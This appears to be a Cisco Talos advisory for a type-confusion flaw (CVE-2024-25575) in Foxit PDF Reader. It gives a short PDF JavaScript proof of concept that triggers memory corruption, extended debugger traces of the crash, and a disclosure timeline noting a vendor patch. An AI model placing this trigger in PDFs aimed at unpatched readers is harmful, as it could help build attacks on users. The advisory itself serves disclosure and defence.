CVE-2024-25575
A type confusion vulnerability vulnerability exists in the way Foxit Reader 2024.1.0.23997 handles a Lock object. A specially crafted Javascript code inside a malicious PDF document can trigger this vulnerability, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site if the browser plugin extension is enabled.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Foxit Reader 2024.1.0.23997
Foxit Reader - https://www.foxitsoftware.com/pdf-reader/
8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-843 - Access of Resource Using Incompatible Type (‘Type Confusion’)
Foxit PDF Reader is one of the most popular PDF document readers. It aims for feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. Foxit Reader uses the V8 JavaScript engine.
Javascript support in PDF renderers and editors enables dynamic documents that can change based on user input or events. There exists a type confusion vulnerability in the way Foxit Reader handles the fields property of the Lock object. This can be illustrated by the following proof-of-concept code:
function main() {
var lock_object = app.activeDocs[0].addField( 'AA', "signature", 0, [10,214,3] ).getLock() ;
app.activeDocs[0].deletePages();
app.fs.transitions;
lock_object.__defineGetter__('fields', function () {});
}
In the above code, getLock returns a Lock object that contains contains action and fields as lock properties. Next, the deletePages method is called, which in turn ends up freeing a large number of objects. It also resets the fields property of the Lock object and assigns it to a different object. The exact cause of this behaviour is unknown. Later on, when the fields property of the Lock object is used in getter without its type validation, a type confusion vulnerability occurs. We can observe the following in the debugger (with PageHeap enabled):
0:000> g
eax=072fe128 ebx=072fe194 ecx=02993220 edx=00000002 esi=10c2ef88 edi=15b68098
eip=02cd56e9 esp=072fe100 ebp=072fe140 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!FXJSE_GetClass+0x269:
02cd56e9 ffd1 call ecx {FoxitPDFReader!safe_vsnprintf+0x11f83f0 (02993220)} <-------------------------------------- (1)
0:000> t
eax=072fe128 ebx=072fe194 ecx=02993220 edx=00000002 esi=10c2ef88 edi=15b68098
eip=02993220 esp=072fe0fc ebp=072fe140 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!safe_vsnprintf+0x11f83f0:
02993220 55 push ebp
0:000> pc
eax=15b68098 ebx=072fe194 ecx=02993220 edx=00000002 esi=10c2ef88 edi=15b68098
eip=0299324b esp=072fe064 ebp=072fe0f8 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x11f841b:
0299324b e8c0e23300 call FoxitPDFReader!FXJSE_Value_ToObject (02cd1510)
[...]
0:000> pc
eax=00000001 ebx=072fe194 ecx=072fe068 edx=00000001 esi=10c2ef88 edi=15b68098
eip=029934a8 esp=072fe060 ebp=072fe0f8 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x11f8678:
029934a8 e8d33f3cff call FoxitPDFReader!safe_vsnprintf+0x5bc650 (01d57480)
0:000> pc
eax=072fe068 ebx=072fe194 ecx=0cf82020 edx=636f4c74 esi=10c2ef88 edi=15b68098
eip=029934b0 esp=072fe068 ebp=072fe0f8 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x11f8680:
029934b0 e8ebd9eeff call FoxitPDFReader!safe_vsnprintf+0x10e6070 (02880ea0)
0:000> pc
eax=15b68098 ebx=072fe194 ecx=12b2a800 edx=072fe120 esi=10c2ef88 edi=15b68098
eip=029934c4 esp=072fe060 ebp=072fe0f8 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
FoxitPDFReader!safe_vsnprintf+0x11f8694:
029934c4 e8d7d90200 call FoxitPDFReader!safe_vsnprintf+0x1226070 (029c0ea0) ;<--------------------------------------- (2)
0:000> t
eax=15b68098 ebx=072fe194 ecx=12b2a800 edx=072fe120 esi=10c2ef88 edi=15b68098
eip=029c0ea0 esp=072fe05c ebp=072fe0f8 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
FoxitPDFReader!safe_vsnprintf+0x1226070:
029c0ea0 55 push ebp
[...]
0:000> p
eax=072fe038 ebx=072fe194 ecx=3d29bd01 edx=0cf670d8 esi=10c2ef88 edi=15b68098
eip=029c1088 esp=072fdfe0 ebp=072fe058 iopl=0 nv up ei pl nz ac po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200212
FoxitPDFReader!safe_vsnprintf+0x1226258:
029c1088 c645fc06 mov byte ptr [ebp-4],6 ss:002b:072fe054=05
0:000> p
eax=072fe038 ebx=072fe194 ecx=3d29bd01 edx=0cf670d8 esi=10c2ef88 edi=15b68098
eip=029c108c esp=072fdfe0 ebp=072fe058 iopl=0 nv up ei pl nz ac po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200212
FoxitPDFReader!safe_vsnprintf+0x122625c:
029c108c 8b4de8 mov ecx,dword ptr [ebp-18h] ss:002b:072fe040=186cf590
0:000> p
eax=072fe038 ebx=072fe194 ecx=186cf590 edx=0cf670d8 esi=10c2ef88 edi=15b68098
eip=029c108f esp=072fdfe0 ebp=072fe058 iopl=0 nv up ei pl nz ac po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200212
FoxitPDFReader!safe_vsnprintf+0x122625f:
029c108f 51 push ecx
0:000> p
eax=072fe038 ebx=072fe194 ecx=186cf590 edx=0cf670d8 esi=10c2ef88 edi=15b68098
eip=029c1090 esp=072fdfdc ebp=072fe058 iopl=0 nv up ei pl nz ac po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200212
FoxitPDFReader!safe_vsnprintf+0x1226260:
029c1090 8d4de0 lea ecx,[ebp-20h]
0:000> p
eax=072fe038 ebx=072fe194 ecx=072fe038 edx=0cf670d8 esi=10c2ef88 edi=15b68098
eip=029c1093 esp=072fdfdc ebp=072fe058 iopl=0 nv up ei pl nz ac po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200212
FoxitPDFReader!safe_vsnprintf+0x1226263:
029c1093 e8483afeff call FoxitPDFReader!safe_vsnprintf+0x1209cb0 (029a4ae0)
0:000> p
eax=0cf670d8 ebx=072fe194 ecx=072fe038 edx=0cf670d8 esi=10c2ef88 edi=15b68098
eip=029c1098 esp=072fdfdc ebp=072fe058 iopl=0 nv up ei pl nz ac po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200212
FoxitPDFReader!safe_vsnprintf+0x1226268:
029c1098 8bc8 mov ecx,eax
0:000> p
eax=0cf670d8 ebx=072fe194 ecx=0cf670d8 edx=0cf670d8 esi=10c2ef88 edi=15b68098
eip=029c109a esp=072fdfdc ebp=072fe058 iopl=0 nv up ei pl nz ac po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200212
FoxitPDFReader!safe_vsnprintf+0x122626a:
029c109a e8115cffff call FoxitPDFReader!safe_vsnprintf+0x121be80 (029b6cb0)
0:000> p
eax=0cf670d8 ebx=072fe194 ecx=186cf590 edx=0cf670d8 esi=10c2ef88 edi=15b68098
eip=029c109f esp=072fdfe0 ebp=072fe058 iopl=0 nv up ei pl nz ac po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200212
FoxitPDFReader!safe_vsnprintf+0x122626f:
029c109f 8d55e0 lea edx,[ebp-20h]
0:000> dd 0cf670d8 ;<--------------------------------------- (3)
0cf670d8 04cf3fac 3f800000 15d296e8 00000000
0cf670e8 102478c0 10247900 10247900 00000007
0cf670f8 00000008 00000000 00000000 00000000
0cf67108 3f800000 12bca3d8 00000000 15968138
0cf67118 15968178 15968178 00000007 00000008
0cf67128 3f800000 12d33e28 00000000 1307cc68
0cf67138 1307cca8 1307cca8 00000007 00000008
0cf67148 3f800000 15d6c250 00000000 10e7bbb8
0:000> dd 0cf670d8+98 ;<--------------------------------------- (4)
0cf67170 186cf590 186dff00 00000000 00000000
0cf67180 00000000 00000000 00000000 00000004
0cf67190 00000000 00000000 00000000 00000000
0cf671a0 00000000 00000000 00000000 00000000
0cf671b0 00000000 00000000 00000000 00000000
0cf671c0 00000000 00000000 00000000 00000000
0cf671d0 00000000 00000000 00000000 00000000
0cf671e0 00000000 00000000 00000000 00000000
0:000> dd 186cf590 ;<--------------------------------------- (5)
186cf590 00000000 00000000 0ed5b610 186cf560
186cf5a0 00000000 186beb48 00000000 00000001
186cf5b0 00000000 00000004 00000000 00000000
186cf5c0 00010006 186cf560 00000000 00000000
186cf5d0 00000000 186d28e0 00000010 00000002
186cf5e0 0cf6377c 0cf63758 0000000a 00000000
186cf5f0 00000001 00000010 00000010 00690054
186cf600 0065006d 00200073 006f0042 0064006c
0:000> g
eax=072fe128 ebx=072fe194 ecx=02904f80 edx=00000002 esi=16091920 edi=1608d378
eip=02cd56e9 esp=072fe100 ebp=072fe140 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!FXJSE_GetClass+0x269:
02cd56e9 ffd1 call ecx {FoxitPDFReader!safe_vsnprintf+0x116a150 (02904f80)} ;<--------------------------------------- (6)
0:000> g
Javascript::CFXJS_Lock::get_fields_static
eax=0cf642d0 ebx=0c38e338 ecx=3d29bdf1 edx=10c7cc08 esi=072fe0e0 edi=0f5f2098
eip=02996c56 esp=072fdf3c ebp=072fdfc8 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!safe_vsnprintf+0x11fbe26:
02996c56 837dec00 cmp dword ptr [ebp-14h],0 ss:002b:072fdfb4=0cf642d0
0:000> dd 186cf590 ;<--------------------------------------- (7)
186cf590 00000000 00000010 00000011 006e0055
186cf5a0 006f0063 00650076 00520072 00670069
186cf5b0 00740068 006f0044 006e0077 00000000
186cf5c0 00010006 186cf560 00000000 00000000
186cf5d0 00000000 186d28e0 00000010 00000002
186cf5e0 0cf6377c 0cf63758 0000000a 00000000
186cf5f0 00000001 00000010 00000010 00690054
186cf600 0065006d 00200073 006f0042 0064006c
At (1) above, the javascript::CFXJS_Field::getLock_static method is called. The getLock_static method calls javascript::Field::getLock at (2). getlock returns a Lock object and its value can be observed at (3). The Lock object contains a Field object at offset 0x98 and the address of the Field object can be observed at (4). The javascript::CFXJS_Document::deletePages_static method is called at (6) which resets the Field object. The dereference value of the vulnerable Field object can be observed before and after the call to deletePages_static at (5) and (7). It can be observed that the vulnerable object type is different after the call to deletePages_static. The crash occurs whe the vulnerable Field object was accessed without its type validation. This can be observed in a debugger at the time of the crash:
0:000> p
eax=00520072 ebx=0c38e338 ecx=186cf590 edx=0c38e338 esi=072fe0e0 edi=0f5f2098
eip=029b133e esp=072fde58 ebp=072fdecc iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!safe_vsnprintf+0x121650e:
029b133e 8945d0 mov dword ptr [ebp-30h],eax ss:002b:072fde9c=0579f380
0:000> pc
eax=00000000 ebx=0c38e338 ecx=186cf590 edx=0cf670d8 esi=072fe0e0 edi=0f5f2098
eip=029b1365 esp=072fde54 ebp=072fdecc iopl=0 nv up ei ng nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200297
FoxitPDFReader!safe_vsnprintf+0x1216535:
029b1365 e8261717ff call FoxitPDFReader!safe_vsnprintf+0x387c60 (01b22a90) ;<--------------------------------------- (8)
0:000> db ecx
186cf590 00 00 00 00 10 00 00 00-11 00 00 00 55 00 6e 00 ............U.n.
186cf5a0 63 00 6f 00 76 00 65 00-72 00 52 00 69 00 67 00 c.o.v.e.r.R.i.g.
186cf5b0 68 00 74 00 44 00 6f 00-77 00 6e 00 00 00 00 00 h.t.D.o.w.n.....
186cf5c0 06 00 01 00 60 f5 6c 18-00 00 00 00 00 00 00 00 ....`.l.........
186cf5d0 00 00 00 00 e0 28 6d 18-10 00 00 00 02 00 00 00 .....(m.........
186cf5e0 7c 37 f6 0c 58 37 f6 0c-0a 00 00 00 00 00 00 00 |7..X7..........
186cf5f0 01 00 00 00 10 00 00 00-10 00 00 00 54 00 69 00 ............T.i.
186cf600 6d 00 65 00 73 00 20 00-42 00 6f 00 6c 00 64 00 m.e.s. .B.o.l.d.
0:000> t
eax=00000000 ebx=0c38e338 ecx=186cf590 edx=0cf670d8 esi=072fe0e0 edi=0f5f2098
eip=01b22a90 esp=072fde50 ebp=072fdecc iopl=0 nv up ei ng nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200297
FoxitPDFReader!safe_vsnprintf+0x387c60:
01b22a90 55 push ebp
0:000> p
eax=00000000 ebx=0c38e338 ecx=186cf590 edx=0cf670d8 esi=072fe0e0 edi=0f5f2098
eip=01b22a91 esp=072fde4c ebp=072fdecc iopl=0 nv up ei ng nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200297
FoxitPDFReader!safe_vsnprintf+0x387c61:
01b22a91 8bec mov ebp,esp
0:000> p
eax=00000000 ebx=0c38e338 ecx=186cf590 edx=0cf670d8 esi=072fe0e0 edi=0f5f2098
eip=01b22a93 esp=072fde4c ebp=072fde4c iopl=0 nv up ei ng nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200297
FoxitPDFReader!safe_vsnprintf+0x387c63:
01b22a93 8b5508 mov edx,dword ptr [ebp+8] ss:002b:072fde54=00000000
0:000> p
eax=00000000 ebx=0c38e338 ecx=186cf590 edx=00000000 esi=072fe0e0 edi=0f5f2098
eip=01b22a96 esp=072fde4c ebp=072fde4c iopl=0 nv up ei ng nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200297
FoxitPDFReader!safe_vsnprintf+0x387c66:
01b22a96 85d2 test edx,edx
0:000> p
eax=00000000 ebx=0c38e338 ecx=186cf590 edx=00000000 esi=072fe0e0 edi=0f5f2098
eip=01b22a98 esp=072fde4c ebp=072fde4c iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
FoxitPDFReader!safe_vsnprintf+0x387c68:
01b22a98 7817 js FoxitPDFReader!safe_vsnprintf+0x387c81 (01b22ab1) [br=0]
0:000> p
eax=00000000 ebx=0c38e338 ecx=186cf590 edx=00000000 esi=072fe0e0 edi=0f5f2098
eip=01b22a9a esp=072fde4c ebp=072fde4c iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
FoxitPDFReader!safe_vsnprintf+0x387c6a:
01b22a9a 3b5118 cmp edx,dword ptr [ecx+18h] ds:002b:186cf5a8=00520072
0:000> p
eax=00000000 ebx=0c38e338 ecx=186cf590 edx=00000000 esi=072fe0e0 edi=0f5f2098
eip=01b22a9d esp=072fde4c ebp=072fde4c iopl=0 nv up ei ng nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200297
FoxitPDFReader!safe_vsnprintf+0x387c6d:
01b22a9d 7d12 jge FoxitPDFReader!safe_vsnprintf+0x387c81 (01b22ab1) [br=0]
0:000> p
eax=00000000 ebx=0c38e338 ecx=186cf590 edx=00000000 esi=072fe0e0 edi=0f5f2098
eip=01b22a9f esp=072fde4c ebp=072fde4c iopl=0 nv up ei ng nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200297
FoxitPDFReader!safe_vsnprintf+0x387c6f:
01b22a9f 83c110 add ecx,10h
0:000> p
eax=00000000 ebx=0c38e338 ecx=186cf5a0 edx=00000000 esi=072fe0e0 edi=0f5f2098
eip=01b22aa2 esp=072fde4c ebp=072fde4c iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!safe_vsnprintf+0x387c72:
01b22aa2 3b5108 cmp edx,dword ptr [ecx+8] ds:002b:186cf5a8=00520072
0:000> p
eax=00000000 ebx=0c38e338 ecx=186cf5a0 edx=00000000 esi=072fe0e0 edi=0f5f2098
eip=01b22aa5 esp=072fde4c ebp=072fde4c iopl=0 nv up ei ng nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200297
FoxitPDFReader!safe_vsnprintf+0x387c75:
01b22aa5 7d10 jge FoxitPDFReader!safe_vsnprintf+0x387c87 (01b22ab7) [br=0]
0:000> p
eax=00000000 ebx=0c38e338 ecx=186cf5a0 edx=00000000 esi=072fe0e0 edi=0f5f2098
eip=01b22aa7 esp=072fde4c ebp=072fde4c iopl=0 nv up ei ng nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200297
FoxitPDFReader!safe_vsnprintf+0x387c77:
01b22aa7 8b4104 mov eax,dword ptr [ecx+4] ds:002b:186cf5a4=00650076
0:000> p
eax=00650076 ebx=0c38e338 ecx=186cf5a0 edx=00000000 esi=072fe0e0 edi=0f5f2098
eip=01b22aaa esp=072fde4c ebp=072fde4c iopl=0 nv up ei ng nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200297
FoxitPDFReader!safe_vsnprintf+0x387c7a:
01b22aaa 8b0490 mov eax,dword ptr [eax+edx*4] ds:002b:00650076=498dffff ;<--------------------------- (9)
0:000> dd eax
00650076 498dffff ad00e8f0 45c6ffd2 8d8b06fc
00650086 fffffdb0 d2acf1e8 bc858bff bbfffffd
00650096 04fb8ccc fdb88d8b 8940ffff fffdbc85
006500a6 0fc13bff fffaa18c 85db33ff 665d7ec9
006500b6 1f0f6666 00000084 958d0000 fffffd8c
006500c6 93e8cb8b 8bffe703 7d979035 94353b05
006500d6 74057d97 94bd8b2e 57fffffd 17e8ce8b
006500e6 85ffd4df 8d1175c0 fffd8c85 97a8b9ff
0:000> p
eax=498dffff ebx=0c38e338 ecx=186cf5a0 edx=00000000 esi=072fe0e0 edi=0f5f2098
eip=01b22aad esp=072fde4c ebp=072fde4c iopl=0 nv up ei ng nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200297
FoxitPDFReader!safe_vsnprintf+0x387c7d:
01b22aad 5d pop ebp
0:000> p
eax=498dffff ebx=0c38e338 ecx=186cf5a0 edx=00000000 esi=072fe0e0 edi=0f5f2098
eip=01b22aae esp=072fde50 ebp=072fdecc iopl=0 nv up ei ng nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200297
FoxitPDFReader!safe_vsnprintf+0x387c7e:
01b22aae c20400 ret 4
0:000> p
eax=498dffff ebx=0c38e338 ecx=186cf5a0 edx=00000000 esi=072fe0e0 edi=0f5f2098
eip=029b136a esp=072fde58 ebp=072fdecc iopl=0 nv up ei ng nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200297
FoxitPDFReader!safe_vsnprintf+0x121653a:
029b136a 8945d8 mov dword ptr [ebp-28h],eax ss:002b:072fdea4=00000000
[...]
0:000> p
eax=072fde6c ebx=0c38e338 ecx=072fde00 edx=072fde6c esi=072fe0e0 edi=0f5f2098
eip=029b138d esp=072fde54 ebp=072fdecc iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x121655d:
029b138d 8b4dd8 mov ecx,dword ptr [ebp-28h] ss:002b:072fdea4=498dffff
0:000> p
eax=072fde6c ebx=0c38e338 ecx=498dffff edx=072fde6c esi=072fe0e0 edi=0f5f2098
eip=029b1390 esp=072fde54 ebp=072fdecc iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x1216560:
029b1390 e84b18b3fd call FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0x23730 (004e2be0)
0:000> t
eax=072fde6c ebx=0c38e338 ecx=498dffff edx=072fde6c esi=072fe0e0 edi=0f5f2098
eip=004e2be0 esp=072fde50 ebp=072fdecc iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0x23730:
004e2be0 8b4108 mov eax,dword ptr [ecx+8] ds:002b:498e0007=???????? ;<--------------------------------------- (10)
0:000> dd 498dffff
498dffff ???????? ???????? ???????? ????????
498e000f ???????? ???????? ???????? ????????
498e001f ???????? ???????? ???????? ????????
498e002f ???????? ???????? ???????? ????????
498e003f ???????? ???????? ???????? ????????
498e004f ???????? ???????? ???????? ????????
498e005f ???????? ???????? ???????? ????????
498e006f ???????? ???????? ???????? ????????
0:000> u
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0x23730:
004e2be0 8b4108 mov eax,dword ptr [ecx+8]
004e2be3 c3 ret
004e2be4 cc int 3
004e2be5 cc int 3
004e2be6 cc int 3
004e2be7 cc int 3
004e2be8 cc int 3
004e2be9 cc int 3
0:000> kb
# ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 072fdecc 029c0374 3d29bdf9 0f5f2098 072fe0e0 FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0x23730
01 072fdf28 02996ec7 0c38e338 072fdf70 00000000 FoxitPDFReader!safe_vsnprintf+0x1225544
02 072fdfc8 02cd5841 0f5f2098 072fdfec 0c38e338 FoxitPDFReader!safe_vsnprintf+0x11fc097
03 072fe008 02d4825a 072fe2d4 072fe094 072fe188 FoxitPDFReader!FXJSE_GetClass+0x3c1
04 072fe0e8 02d47e5b 072fe148 072fe188 072fe1bc FoxitPDFReader!CFXJSE_Arguments::GetValue+0x7249a
05 072fe120 02d641fc 072fe148 072fe188 00000000 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x7209b
06 072fe16c 02d697d9 072fe1ea 072f0001 072fe1bc FoxitPDFReader!CFXJSE_Arguments::GetValue+0x8e43c
07 072fe1d4 02d5fbda 072fe25c 10c7cc08 072fe2d0 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x93a19
08 072fe204 02edd58a 072fe25c 10c7cc08 072fe2d0 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x89e1a
09 072fe250 02edd633 072fe294 10c7cc08 072fe2d0 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x2077ca
0a 072fe27c 02edf8ab 072fe294 00000007 072fe2d8 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x207873
0b 072fe298 030db17b 00000007 072fe2d8 10c7cc08 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x209aeb
0c 072fe2b8 030771d9 3b242339 24fd208d 0000000e FoxitPDFReader!CFXJSE_Arguments::GetValue+0x4053bb
0d 072fe310 030771d9 24ffeb6d 156d1dc1 156d1e05 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a1419
0e 072fe33c 03075860 24ffeb6d 3b2421b1 156d1dc1 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a1419
0f 072fe354 03075689 00000000 00000000 00000002 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x39faa0
10 072fe380 02d11f4e 10c7cc08 3b242339 156d1dc1 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x39f8c9
11 072fe490 02d11a42 072fe624 10c7cc08 072fe4ec FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3c18e
12 072fe518 02cfa744 072fe624 10c7cc08 1583e984 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3bc82
13 072fe6c8 02cfa240 072fe764 1583e9a8 00000000 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x24984
14 072fe6dc 02cd3c5f 072fe764 1583e9a8 3d298585 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x24480
15 072fe754 02cd4596 1583e984 15ba5978 1583e970 FoxitPDFReader!FXJSE_Runtime_Release+0xeaf
16 072fe790 02878af7 131d04b8 186ba434 15ba5978 FoxitPDFReader!FXJSE_ExecuteScript+0x86
17 072fe848 0287a129 00000000 072fe8d8 072fe880 FoxitPDFReader!safe_vsnprintf+0x10ddcc7
18 072fe860 00bb20df 072fe8d8 072fe880 3d298a41 FoxitPDFReader!safe_vsnprintf+0x10df2f9
19 072fe890 00bb0fa4 1302d910 00000015 072fe8b8 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c69cf
1a 072fe8d0 00baf9d0 0ed397e8 10172188 1da9e708 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c5894
1b 072fe924 0049d322 072fe954 10172188 1da9e708 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c42c0
1c 072fe974 0071901b 00000000 3d299749 7fffffff FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x8852
1d 072ff598 03cb9713 00000000 00000000 3d2994b9 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x6194b
1e 072ff668 03cba8ec 00000429 00000000 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x199cc3
1f 072ff68c 03cb5292 00000429 00000000 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x19ae9c
20 072ff700 03cb5b05 101713d8 000a0990 00000429 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x195842
21 072ff720 750c120b 000a0990 00000429 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x1960b5
22 072ff74c 750b81ca 03cb5ad1 000a0990 00000429 USER32!AddClipboardFormatListener+0x4b
23 072ff830 750b5f2a 03cb5ad1 00000000 00000429 USER32!GetClassLongW+0x7ba
24 072ff8a4 750b5cf0 00000329 072ff8cc 0069f324 USER32!DispatchMessageW+0x24a
25 072ff8b0 0069f324 0c3c8fe8 0c3c8fe8 057d98e8 USER32!DispatchMessageW+0x10
26 072ff8cc 0069f3e3 057d98e8 0069f350 ffffffff FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0x1dfe74
27 072ff8ec 040e29c2 00000000 0580550c 0710e000 FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0x1dff33
28 072ff904 03e9cef1 00250000 00000000 0c3653c4 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x5c2f72
29 072ff950 76ddfcc9 0710e000 76ddfcb0 072ff9bc FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x37d4a1
2a 072ff960 77247c6e 0710e000 8017ce93 00000000 KERNEL32!BaseThreadInitThunk+0x19
2b 072ff9bc 77247c3e ffffffff 77268c33 00000000 ntdll!RtlGetAppContainerNamedObjectPath+0x11e
2c 072ff9cc 00000000 03e9cfc0 0710e000 00000000 ntdll!RtlGetAppContainerNamedObjectPath+0xee
At (8), CPDF_FormField::GetControl is called. It takes the Field object as an argument and returns a Control object. However, the object type is a string object rather than a Field object. When GetControl tried to get the Control object at (9), it dereferenced the arbitrary value of the string object as an pointer. The crash didn’t occur here because the arbitrary value points to the allocated memory region. At (10), the crash occurs when ecx is dereferenced as if it were an object pointer. Depending on the memory layout of the process, it may be possible to gain arbitrary read and write access, which could ultimately be abused to achieve arbitrary code execution.
The vendor has provided updated versions
2024-04-01 - Vendor Disclosure
2024-04-28 - Vendor Patch Release
2024-04-30 - Public Release
Discovered by KPC of Cisco Talos.